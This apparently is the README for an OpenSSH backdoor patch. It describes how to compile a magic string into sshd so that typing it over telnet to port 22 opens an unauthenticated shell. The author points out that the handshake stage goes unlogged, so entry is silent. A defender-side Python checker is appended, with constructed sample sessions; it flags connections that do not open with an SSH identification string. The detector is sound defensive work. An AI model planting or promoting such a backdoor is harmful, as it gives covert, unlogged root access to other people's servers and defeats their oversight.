In the good old days I made a very simple, but nice sshd backdoor for old sshd
1.2.xx. Now it's time for something even more lame, but in the old, good Lam3rZ
style also! :)
It's a patch for current openssh.
How to use it?
You know how to patch sources, don't you? :)
Change the #define EVIL "LETMEIN" to any evil, magic string you like, patch
the openssh sources, rebuild and install.
The usage is rather simple, see below:
root@evil(chroot):~# telnet victim 22
Connected to victim.
Escape character is '^]'.
sh: no job control in this shell
Shift to the left,
Shift to the right,
Mask in, mask out,
BYTE, BYTE, BYTE !!!
telnet> mode c
Here comes the explanation:
First you connect to the ssh port (22 preferably ;), then you type the magic string ("LETMEIN" in this case) so that the login shell gets spawned. To get terminal capability you need to change the telnet mode to 'character', so press the
CTRL-] (^]) sequence and type "mode character", or "mode c".
At this point you have a very nice terminal! Some features are missing, but
I leave it up to you as an exercise, believe me, it's very easy ;) Besides
that you may not even notice what's wrong...
Why is it done this way?
The main reason is that at the very beginning of the handshake there is no logging. Not even connection logging, so you're entering the victim's environment silently...
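Since sshd itself logs nothing at that point, the one place the behaviour described above still leaves a trace is the network stream: a legitimate SSH client opens with its protocol identification string ("SSH-2.0-..."), whereas a magic string typed into telnet does not. The following defender-side check is an added example, not part of this patch or post; the session records in it are constructed, and the set of accepted identification prefixes is an assumption you should widen for your own environment.

```python
import re

# Protocol identification strings a real SSH client sends as its first bytes
# (assumed set; extend it if you still see SSH-1.x clients).
SSH_IDENT = re.compile(rb"^SSH-(2\.0|1\.99|1\.5)-")


def classify_first_client_bytes(data: bytes) -> str:
    """Classify the first bytes a client sent on a TCP/22 session."""
    if not data:
        return "empty"
    if SSH_IDENT.match(data):
        return "ssh"
    # 0xff is the telnet IAC byte: a raw telnet client negotiating options,
    # which no SSH client ever does.
    if data[0] == 0xFF:
        return "telnet-negotiation"
    return "non-ssh"


def suspicious_sessions(sessions):
    """Return the ids of sessions that did not open with an SSH ident string.

    `sessions` is an iterable of (session_id, first_client_bytes) pairs, e.g.
    reassembled from a capture on the sshd side.
    """
    return [sid for sid, payload in sessions
            if classify_first_client_bytes(payload) != "ssh"]


# Constructed sample sessions, not real captures: (id, first bytes to port 22).
SAMPLE_SESSIONS = [
    ("s1", b"SSH-2.0-OpenSSH_9.6\r\n"),      # normal client
    ("s2", b"LETMEIN\r\n"),                  # magic string instead of an ident
    ("s3", b"\xff\xfd\x03\xff\xfb\x18"),     # telnet option negotiation
    ("s4", b""),                             # connected, sent nothing
]

if __name__ == "__main__":
    for sid in suspicious_sessions(SAMPLE_SESSIONS):
        print("review session", sid, "->",
              classify_first_client_bytes(dict(SAMPLE_SESSIONS)[sid]))
```

Scanners and port-probing tools also produce "non-ssh" openings, so treat a hit as something to review against the host (e.g. verify the installed sshd binary against its package checksum) rather than as proof of a backdoor.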